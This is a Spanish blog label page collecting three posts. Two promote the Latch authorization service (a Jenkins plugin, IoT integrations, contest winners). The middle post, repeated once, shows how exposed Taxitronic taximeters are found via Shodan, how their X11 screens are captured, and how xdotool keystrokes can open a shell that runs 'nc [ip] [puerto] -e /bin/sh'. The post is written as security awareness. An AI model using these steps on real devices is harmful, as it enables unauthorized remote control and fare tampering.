Showing posts with label iot. Show all posts
Showing posts with label iot. Show all posts
Monday, January 23, 2017
Latch para Jenkins Latch para IoT y 20 plugins más
Latch para Jenkins Latch para IoT y 20 plugins más
Ayer publicamos en el blog de Eleven Paths un artículo sobre cómo utilizar Latch en Jenkins para que todos los que utilizan esta plataforma de integración continua puedan usar nuestro sistema de 2º Factor de Autorización en ella. Al final, dentro de nuestro trabajo intentamos fortificar todas las tecnologías con las que trabajamos internamente, así que hemos depurado algo que ya habíamos implementado en nuestros sistemas para que pueda ser utilizado por todo el mundo que quiera.
![]() |
| Figura 1: Latch pata Jenkins, Latch para IoT y 20 plugins más |
Si no eres de 450.000 usuarios que tiene a día de hoy Latch porque no conoces el sistema, te dejo una de las muchas charlas que di en el pasado sobre esta tecnología para que entiendas cuál es el pensamiento que nos llevó a crear esta pieza de nuestra visión de cómo debe ser un sistema de autenticación hoy en día.
Figura 2: Latch y la importancia de la seguridad de la identidad
La lista de plugins que tenemos hoy en día ya es muy larga y puedes acceder a todos ellos dentro del área de developer en la web de Latch. Como puedes ver, allí, en la sección de Plugins & SDK ya está disponible el último plugin que hemos lanzado.
![]() |
| Figura 3: Plugins de Latch (1). Ya disponible para Jenkins |
Pero la lista es larga, y probablemente seguirá creciendo mucho. Además, hay integraciones de plugins que no son nuestras directamente, pero que están disponibles porque las ha hecho la comunidad. Desde integraciones en Django hasta plugins para el framework Laravel PHP. De todas ellas he intentado ir hablando por aquí, pero siempre puedes ir a la sección de documentación en la web de Latch o preguntar en la Comunidad de Eleven Paths para ver si hay una implementación disponible de Latch para tu sistema.
![]() |
| Figura 4: Plugins de Latch (2) |
De muchos de esos plugins, además, hay vídeos disponibles en Youtube de cómo montarlos. En 10 minutos puedes aprender a proteger un WordPress, un Joomla! o un PrestaShop con Latch siguiendo los pasos de uno de los tutoriales. Hay cuatro listas de vídeos que tengo en el canal Youtube que te pueden ayudar a eso:
- Latch: Conferencias
- Latch: Vídeo-Tutoriales de uso
- Latch Plugin Contest: Integraciones de Latch
- Latch: Integraciones IoT (Internet of Things)
![]() |
| Figura 5: Plugins de Latch (3) |
Al final, tras dos años y medio trabajando con Latch, el número de integraciones que hemos ido construyendo es alta, así que si necesitas alguna en particular, probablemente os podríamos ayudar, así que no dudes en contactar con nosotros para resolver cualquier duda. También está disponible para SalesForce o SugarCRM, que son algunas de las integraciones que nos solicitaron.
![]() |
| Figura 6: Plugins de Latch (4) |
Como podéis ver hay una sección en la lista de vídeos de Latch dedicada al mundo del IoT (Internet of Thing). En esa lista podrás ver cómo Latch se puede integrar con diferentes partes del mundo físico, y esta tarde podrás ver cómo hacerlo tú mismo si asistes a la charla gratutita dentro de las Eleven Paths Talks que impartirá nuestro CSA Jorge Rivera. Como ya os dije, él está detrás de muchos de los proyectos IoT de integración con Latch, incluida la famosa hucha protegida por biometría y Latch que explica en este vídeo cómo funciona.
Figura 7: Funcionaminento de la hucha protegida por biometría y Latch
En la charla de esta tarde podrás ver cómo integrar el mundo físico utilizando alguno de nuestros SDKs para Latch que tienes disponibles en la sección de desarrolladores de Latch. Si estás en la universidad y tienes que hacer un Proyecto de Fin de Carrera o un Proyecto de Fin de Máster que quieres que sea tu carta de presentación en el mundo laboral, desarrollar alguna integración de Latch con el mundo IoT para añadir "El pestillo digital" al mundo físico puede ser una opción y tendrás nuestra ayuda.
![]() |
| Figura 8: SDKs de Latch disponibles |
Como puedes ver en la image de arriba, hay SDKs para muchos entornos, así que si quieres animarte a hacer algo, no tienes excusas para no hacerlo. Aprender es un camino que se basa en hacer cosas que te aporten experiencia y conocimiento, por lo que tus proyectos personales te enriquecerán para siempre.
Saludos Malignos!
Sigue Un informático en el lado del mal - Google+ RSS 0xWord

Available link for download
Friday, November 11, 2016
Hacking de taxímetros en España vía Shodan Taxitronic IoT
Hacking de taxímetros en España vía Shodan Taxitronic IoT
¿Quién a día de hoy aún no ha oído hablar del tan conocido y popular IoT (Internet of Things) Internet de las cosas? Los avances tecnológicos nos favorecen en muchos campos de nuestras vidas, pero todo tiene su parte negativa si no nos tomamos en serio los riesgos de una mala utilización y en este caso las consecuencias pueden ser muy negativas. Estamos asistiendo a un cambio en ámbito y en escala con la llegada del IoT - o como algunos dicen, el IoE (Internet of Everything) - que hará que dentro de 5 o 6 años prácticamente todos los electrodomésticos en concreto y objetos en general, tengan de serie conectividad con Internet de algún modo u otro. A día de hoy los coches modernos ya traen esta conexión constante vía 2G, 3G o 4G y todos nosotros llevamos encima al menos un dispositivo conectado a Internet constantemente.
Hace ya mas de un año que se publicó la primera vulnerabilidad en un automóvil que permitía el control total del vehículo, y ya son comunes las vulnerabilidades en SmartTV, en dispositivos móviles, frigoríficos, lavadoras, cámaras de vigilancia, parquímetros de bicicletas e incluso equipos médicos para controlar el latido del corazón dentro del cuerpo de las personas. La gran variedad de dispositivos y de plataformas dificulta mucho la corrección de estos fallos de seguridad, porque en muchísimos casos la actualización de estos dispositivos no es trivial, no existe o el coste del mismo no permite contar con un ciclo de gestión de la seguridad a largo plazo.
Sin embargo, debemos plantearnos que cuando conectamos algo a Internet está expuesto al mundo entero y que del mismo modo que cuando salimos de casa dejamos la puerta cerrada, en Internet debemos hacer lo mismo con todos los dispositivos que nos unen a la red. Es un trabajo de toda la industria que está involucrada en la evolución del IoT o iremos descubriendo caso tras caso, como vivimos en un mundo muy inseguro. Y en el mundo de la empresa, a veces los responsables de seguridad no saben ni que existen esos dispositivos, por eso hablamos del famoso Shadow IoT.
En este caso os traigo un ejemplo muy llamativo, algunos de los taxímetros que se utilizan en España están conectados también a Internet y no de forma muy segura. En muchos taxis se están implementando taxímetros con conexión vía 3G a Internet para de esta forma integrarlos con las rutas más cortas, sistemas de Big Data y distintas aplicaciones móviles que localizan constantemente al vehículo para enviarle de forma directa una nueva petición de transporte. Sin embargo, una vez más, la mala configuración de estos dispositivos puede conllevar que los trayectos de taxi te salgan gratis o al doble de precio, generando un posible problema para el usuario o para el taxista, depende de lo que un posible atacante quiera realizar.
El ejemplo que os voy a poner hoy es el de los Taxímetros 3G de Taxitronic. Basta con leer documentación de los taxímetros que anuncian en su web para saber que usan un sistema GNU/Linux embebido y con algo más de documentación en Internet es fácil descubrir que la distribución que usan es Pengutronix.
Sabiendo la plataforma que usan y que cuentan con conexión a Internet de forma autónoma a cualquiera se le puede pasar por la cabeza hacer un poco de hacking con buscadores e intentar localizar estos dispositivos a través Shodan para saber qué tienen abierto al mundo. Shodan no es un buscador al uso, es muy peculiar por su forma de proceder; realiza barridos completos al rango IPv4 - en IPv6 se quiere hacer similar con Mr.Looquer - y recogiendo los banners de cada puerto en cada dirección IP, para que mas tarde nosotros podamos hacer búsquedas por esta información. En esta caso lo usaremos para buscar por los dispositivos que usan esta plataforma, Pengutronix. Su firma en los banners es "Ptxdist"
No todos los taxímetros tienen que aparecer en estos barridos de Shodan, ya que aquellos que se conecten desde detrás de un proxy sin utilizar una dirección IP pública no aparecerán, pero como las redes son complejas y extensas, es fácil dar con taxímetros conectándose vía SIM desde ubicaciones en las que no hay un proxy que oculte su software. Como podemos ver en la imagen anterior obtenemos más de 70 resultados y si nos fijamos, la sorpresa es mayúscula cuando vemos que tienen el puerto 6000, utilizado por el servicio X11, abierto al exterior.
Tener el servicio X11 abierto significa que hay alguna aplicación gráfica - evidentemente la aplicación del taxímetro - que está siendo ejecutada en el entorno gráfico X de la distribución Linux. Este sistema es especialmente modular, ya que igual que se está lanzando contra el servidor X local, se podría forzar a lanzar la aplicación contra un servidor X situado en otra máquina, por ejemplo la máquina de un posible atacante.
El buscador Shodan, desde hace tiempo, no solo se queda en descubrir qué puertos están abiertos en un determinado servidor, sino que además implementa algunos clientes para mostrar más información pública. Así, por ejemplo, en el caso de los servidores MongoDB que no solicitan autenticación, Shodan muestra el nombre y tamaño de las bases de datos. En el caso de los servidores VNC sin autenticación, Shodan muestra un screenshot de la sesión y, por supuesto, en el caso de los servidores X11 sin autenticación, muestra una captura de lo que se está ejecutando allí. En este caso, varios taxímetros de diferentes taxis de España.
Sabiendo esto, podríamos saber lo que está apareciendo en la pantalla del taxímetro en todo momento de una forma tan sencilla como conectarnos remotamente cada cierto tiempo al servidor X11 y pedir una captura de pantalla para generar un fichero con la imagen que allí se ve. Este es el ejemplo siguiente:
En esta caso concreto el taxi estaba libre, pero podemos esperar y realizar capturas cuando el taxi esté ocupado como, por ejemplo, en esta ocasión:
Al igual que podemos tener acceso al display, podemos simular presiones de teclado o movimientos para manejarlo a nuestro gusto. Aunque si pensamos como un malo nuestro interés sería por ejemplo reiniciar el terminal al llegar al destino para que así este marque 0. Esto seria posible con una shell sobre el taxímetro. Como podemos emular las presiones de teclado podemos usar los atajos de teclado:
Reflexión final
Este ejemplo de los taxímetros, es solo un ejemplo de las repercusiones que tiene el despreocuparse de los dispositivos que tenemos conectados a Internet, a veces parece algo lejano y complejo todo este tipo de situaciones, pero están ahí accesibles a cualquiera y a veces de forma muy sencilla. Todos los implicados en el desarrollo y la evolución del IoT en nuestra sociedad, deben tomar su parte de responsabilidad, desde el usuario hasta el fabricante, para evitar situaciones indeseables en el futuro con cosas menos banales, como son los sistemas SCADA.
Saludos,
Autor: Diego Soto
Nota del autor: Algún paso del proceso ha sido omitido para evitar su reproducción fácilmente
![]() |
| Figura 1: Hacking de taxímetros en España vía Shodan |
Hace ya mas de un año que se publicó la primera vulnerabilidad en un automóvil que permitía el control total del vehículo, y ya son comunes las vulnerabilidades en SmartTV, en dispositivos móviles, frigoríficos, lavadoras, cámaras de vigilancia, parquímetros de bicicletas e incluso equipos médicos para controlar el latido del corazón dentro del cuerpo de las personas. La gran variedad de dispositivos y de plataformas dificulta mucho la corrección de estos fallos de seguridad, porque en muchísimos casos la actualización de estos dispositivos no es trivial, no existe o el coste del mismo no permite contar con un ciclo de gestión de la seguridad a largo plazo.
Sin embargo, debemos plantearnos que cuando conectamos algo a Internet está expuesto al mundo entero y que del mismo modo que cuando salimos de casa dejamos la puerta cerrada, en Internet debemos hacer lo mismo con todos los dispositivos que nos unen a la red. Es un trabajo de toda la industria que está involucrada en la evolución del IoT o iremos descubriendo caso tras caso, como vivimos en un mundo muy inseguro. Y en el mundo de la empresa, a veces los responsables de seguridad no saben ni que existen esos dispositivos, por eso hablamos del famoso Shadow IoT.
![]() |
| Figura 2: Taxímetros de Taxitronic |
En este caso os traigo un ejemplo muy llamativo, algunos de los taxímetros que se utilizan en España están conectados también a Internet y no de forma muy segura. En muchos taxis se están implementando taxímetros con conexión vía 3G a Internet para de esta forma integrarlos con las rutas más cortas, sistemas de Big Data y distintas aplicaciones móviles que localizan constantemente al vehículo para enviarle de forma directa una nueva petición de transporte. Sin embargo, una vez más, la mala configuración de estos dispositivos puede conllevar que los trayectos de taxi te salgan gratis o al doble de precio, generando un posible problema para el usuario o para el taxista, depende de lo que un posible atacante quiera realizar.
El ejemplo que os voy a poner hoy es el de los Taxímetros 3G de Taxitronic. Basta con leer documentación de los taxímetros que anuncian en su web para saber que usan un sistema GNU/Linux embebido y con algo más de documentación en Internet es fácil descubrir que la distribución que usan es Pengutronix.
![]() |
| Figura 3: Distribución Pengutronix sobre la que se basa Taxitronix |
Sabiendo la plataforma que usan y que cuentan con conexión a Internet de forma autónoma a cualquiera se le puede pasar por la cabeza hacer un poco de hacking con buscadores e intentar localizar estos dispositivos a través Shodan para saber qué tienen abierto al mundo. Shodan no es un buscador al uso, es muy peculiar por su forma de proceder; realiza barridos completos al rango IPv4 - en IPv6 se quiere hacer similar con Mr.Looquer - y recogiendo los banners de cada puerto en cada dirección IP, para que mas tarde nosotros podamos hacer búsquedas por esta información. En esta caso lo usaremos para buscar por los dispositivos que usan esta plataforma, Pengutronix. Su firma en los banners es "Ptxdist"
![]() |
| Figura 4: Modelos de Taxitronic indexados en Shodan |
No todos los taxímetros tienen que aparecer en estos barridos de Shodan, ya que aquellos que se conecten desde detrás de un proxy sin utilizar una dirección IP pública no aparecerán, pero como las redes son complejas y extensas, es fácil dar con taxímetros conectándose vía SIM desde ubicaciones en las que no hay un proxy que oculte su software. Como podemos ver en la imagen anterior obtenemos más de 70 resultados y si nos fijamos, la sorpresa es mayúscula cuando vemos que tienen el puerto 6000, utilizado por el servicio X11, abierto al exterior.
![]() |
| Figura 5: Puerto 6000 de X Server abierto en distribución Ptxdist |
Tener el servicio X11 abierto significa que hay alguna aplicación gráfica - evidentemente la aplicación del taxímetro - que está siendo ejecutada en el entorno gráfico X de la distribución Linux. Este sistema es especialmente modular, ya que igual que se está lanzando contra el servidor X local, se podría forzar a lanzar la aplicación contra un servidor X situado en otra máquina, por ejemplo la máquina de un posible atacante.
El buscador Shodan, desde hace tiempo, no solo se queda en descubrir qué puertos están abiertos en un determinado servidor, sino que además implementa algunos clientes para mostrar más información pública. Así, por ejemplo, en el caso de los servidores MongoDB que no solicitan autenticación, Shodan muestra el nombre y tamaño de las bases de datos. En el caso de los servidores VNC sin autenticación, Shodan muestra un screenshot de la sesión y, por supuesto, en el caso de los servidores X11 sin autenticación, muestra una captura de lo que se está ejecutando allí. En este caso, varios taxímetros de diferentes taxis de España.
![]() |
| Figura 6: Taxímetros indexados en Shodan directamente |
Sabiendo esto, podríamos saber lo que está apareciendo en la pantalla del taxímetro en todo momento de una forma tan sencilla como conectarnos remotamente cada cierto tiempo al servidor X11 y pedir una captura de pantalla para generar un fichero con la imagen que allí se ve. Este es el ejemplo siguiente:
![]() |
| Figura 7: Captura de una sesión de un taxímetro realizada con xwd |
En esta caso concreto el taxi estaba libre, pero podemos esperar y realizar capturas cuando el taxi esté ocupado como, por ejemplo, en esta ocasión:
![]() |
| Figura 8: Captura hecha con xwd cuando el taxi estaba ocupado |
Al igual que podemos tener acceso al display, podemos simular presiones de teclado o movimientos para manejarlo a nuestro gusto. Aunque si pensamos como un malo nuestro interés sería por ejemplo reiniciar el terminal al llegar al destino para que así este marque 0. Esto seria posible con una shell sobre el taxímetro. Como podemos emular las presiones de teclado podemos usar los atajos de teclado:
xdotool key alt+f2 // abrimos un cuadro de dialogo para ejecutar una aplicaciónSolo tendríamos que conectarnos a esa dirección IP y ese puerto para tener un terminal y ejecutar comandos en el taxímetro. Pero también podríamos entretenernos poniendo el taxímetro en modo salvapantallas o cosas similares. Pero bastante está mal a día de hoy el mundo del taxi como para que les metan más problemas encima de los que preocuparse.
xdotool key x t e r m // escribimos xterm
xdotool key KP_Enter // presionamos Enter para que se abra la terminal
xdotool key n c space [ip] space [puerto] space minus e space slash b i n slash s h KP_Enter <<< Escribimos en el terminal remoto nc [ip] [puerto] -e /bin/sh
Reflexión final
Este ejemplo de los taxímetros, es solo un ejemplo de las repercusiones que tiene el despreocuparse de los dispositivos que tenemos conectados a Internet, a veces parece algo lejano y complejo todo este tipo de situaciones, pero están ahí accesibles a cualquiera y a veces de forma muy sencilla. Todos los implicados en el desarrollo y la evolución del IoT en nuestra sociedad, deben tomar su parte de responsabilidad, desde el usuario hasta el fabricante, para evitar situaciones indeseables en el futuro con cosas menos banales, como son los sistemas SCADA.
Saludos,
Autor: Diego Soto
Nota del autor: Algún paso del proceso ha sido omitido para evitar su reproducción fácilmente
Sigue Un informático en el lado del mal - Google+ RSS 0xWord

Available link for download
Labels:
de,
en,
espaã±a,
hacking,
iot,
shodan,
taxãmetros,
taxitronic,
vãa
Friday, September 23, 2016
Latch 3 Ganadores de Latch Plugin Contest 2015 charla de Latch en IoT y la integración de Latch con Spamina
Latch 3 Ganadores de Latch Plugin Contest 2015 charla de Latch en IoT y la integración de Latch con Spamina
Después de mucho tiempo metidos en decenas de proyectos diferentes, esta ha sido una semana muy "Latch" en Eleven Paths, pues no solo hemos tenido integraciones con varios clientes nuevos, sino que además se nos han concentrado muchos anuncios y actividades en una sola semana. Primero el lanzamiento del plugin de Latch para Jenkins, luego la charla de Eleven Paths Talks dedicada a Latch para el mundo de IoT (Internet of Things), luego el anuncio de los ganadores del concurso Latch Plugin Contest 2015 y por último el anuncio de la integración de Latch en el servicio de Clean e-Mail.
![]() |
| Figura 1: Latch^3. Ganadores del Latch Plugin Contest, Latch & IoT y Spamina |
Para completar la información que ya os había dejado por aquí, os dejo en primer lugar la sesión de la charla que dio nuestro CSA Jorge Rivera sobre cómo integrar Latch en el mundo IoT. Como ya os he publicado, hay ya muchas demostraciones del partido que se le puede sacar a Latch en el mundo físico.
En segundo lugar os dejo la lista de los ganadores del Latch Plugin Contest 2015. Ya os publicaré en detalle los vídeos, los enlaces a los repositorios de código y los manuales por si quieres probar los trabajos realizados por los ganadores. El próximo 26 de Mayo, dentro de nuestro próximo evento "Security Day 2016", le dedicaremos a los plugins una sesión.
![]() |
| Figura 3: Latch Plugin Contest 2015 |
Primer premio [5.000 USD] para Daniel Crespo por Twlatch (Twitter + Latch)
Descripción: Twlatch (Twitter + Latch) permite en cierta forma crear un Latch sobre Twitter basado en aun aplicación para la plataforma. Si bien no bloquea el acceso directamente, sí permite eliminar inmediatamente los nuevos Tweets cuando se bloquea el Latch. Si bien no es una solución perfecta en algunos sentidos, sí que se ha encontrado una forma interesante de acercarse a una plataforma tan popular como Twitter sin necesidad de "hacks".
Segundo premio [2.000 USD] para Mikel Pintor por Latch para Go
Descripción: Implementa en el lenguaje Go, un sistema para utilizar Latch de forma cómoda por línea de comando en cualquier plataforma, lo que facilita su uso en scripts y otros programas. Como "efecto colateral" ha creado un SDK en Go. Latch para Go facilita el uso en otros entornos y a través de la línea de comando. Además, se ha implementado un nuevo SDK en un lenguaje de interés.
Tercer premio [1.000 USD] para Jorge García Bueno por meta Latch
Descripción: Se trata de un "meta Latch" que permite que los latches funcionen solo cuando se está dentro de una zona física de "proximidad" a un dispositivo que se conecta con Bluetooth. Una vez en la zona, se puede bloquear o desbloquear los latches automáticamente gracias a un token que porte el usuario. Lo que nos ha gustado es que trata de una capa de seguridad adicional que, si bien no es perfecta, aporta fórmulas interesantes aplicables a la vida real donde se facilita aún más, si cabe, el uso de la tecnología Latch.
Mis felicitaciones a los ganadores por el trabajo y esperamos que hayan disfrutado con el reto a la vez que aprendido cosas nuevas. Ahora, con el premio, a darse un buen capricho que os lo habéis ganado.
Por último, como ya anunciamos el viernes en el blog de Eleven Paths, el servicio de Clean e-Mail que damos desde Telefonica a través de nuestra alianza estratégica con Spamina, permite ahora a los 40.000 clientes de este servicio de seguridad para el correo electrónico que pueden usar Latch para controlar aún más los mecanismos de protección de su buzón.
Figura 4: Los clientes de Clean e-mail pueden usar Latch con Spamina
Si quieres ver las posibilidades de integrar Latch en algún sistema, no dudes en ponerte en contacto con nosotros que te asesoraremos y ayudaremos en todo. Además, recuerda que siempre puedes preguntar en la sección Latch en nuestra comunidad técnica en Eleven Paths.
Saludos Malignos!
Sigue Un informático en el lado del mal - Google+ RSS 0xWord

Available link for download
Subscribe to:
Posts (Atom)















